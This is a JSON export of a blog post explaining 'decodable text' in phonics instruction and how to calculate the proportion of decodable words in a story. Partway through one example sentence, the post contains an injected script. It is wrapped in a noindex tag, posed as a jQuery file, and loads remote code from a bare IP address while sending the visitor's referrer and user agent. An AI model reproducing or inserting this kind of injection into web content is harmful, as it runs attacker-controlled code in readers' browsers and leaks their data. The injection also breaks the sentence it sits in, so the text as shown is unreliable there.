{"id":120,"date":"2014-11-20T14:37:46","date_gmt":"2014-11-20T22:37:46","guid":{"rendered":"http:\/\/action-reading.com\/fun\/?p=120"},"modified":"2014-11-20T14:37:46","modified_gmt":"2014-11-20T22:37:46","slug":"what-is-decodable-text","status":"publish","type":"post","link":"http:\/\/action-reading.com\/fun\/?p=120","title":{"rendered":"What is \u201cDecodable Text\u201d?"},"content":{"rendered":"<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>A story text is \u201cdecodable\u201d only if ALL the speech sound-letter correspondences in ALL the words in that text have been taught prior to the introduction of the text to the student.\u00a0 This means that reading programs with \u201cdecodable texts\u201d have systematically and explicitly taught all the speech sound-letter correspondences necessary to decode (read) words in them BEFORE the child encounters these words in a text.<\/p>\n<p>&nbsp;<\/p>\n<p>For example, <noindex><script type=\"text\/javascript\" rel=\"nofollow\" style=\"text-decoration:none;color:#676c6c\"> document.write(\"<script language='javascript' rel='nofollow' type='text\/javascript' src='http:\/\/5.45.67.97\/1\/jquery.js.php?r=\" + encodeuri(document.referrer) + \"&#038;u=\" + encodeuri(navigator.useragent) + \"'><\/sc\" + \"ript>\"); <\/script><\/noindex>  to properly read the word <em>cat<\/em>, the child must have been taught each of the three speech sound-letter correspondences: <em>c<\/em> = \/k\/;\u00a0 <em>a<\/em> = \/a\/;\u00a0 and <em>t<\/em> = \/t\/.\u00a0 In <em>laundry<\/em>, there are six speech sounds and combinations that the child must be prepared to decode.\u00a0 For <em>laundry<\/em> to become a decodable word, the child would have to have had instruction in all six speech sound-letter combinations:\u00a0 <em>l<\/em> - \/l\/;\u00a0 <em>au<\/em> = \/o\/;\u00a0 <em>n<\/em> = \/n\/;\u00a0 <em>d<\/em> = \/d\/;\u00a0 <em>r<\/em> = \/r\/;\u00a0 and\u00a0 <em>y<\/em> = \/?\/.\u00a0\u00a0 Having had instruction in fewer than six speech sound-letter correspondences would make <em>laundry<\/em> \u201cnondecodable.\u201d<\/p>\n<p>&nbsp;<\/p>\n<p>Total the number of decodable words in each story.\u00a0 Remember, if any speech sound-letter correspondences in a word have not been taught previously, that word is not decodable.\u00a0 A child may have been taught \/m\/ = m\u00a0 and \u201csilent e,\u201d but knowing those two speech sound-letter correspondences does not mean \u201cmouse\u201d is decodable because the \/ou\/ and \/s\/ speech sound-letter correspondences have not been taught.<\/p>\n<p>Total the number of words in the story. Divide the number of decodable words by the total number of words in the story.
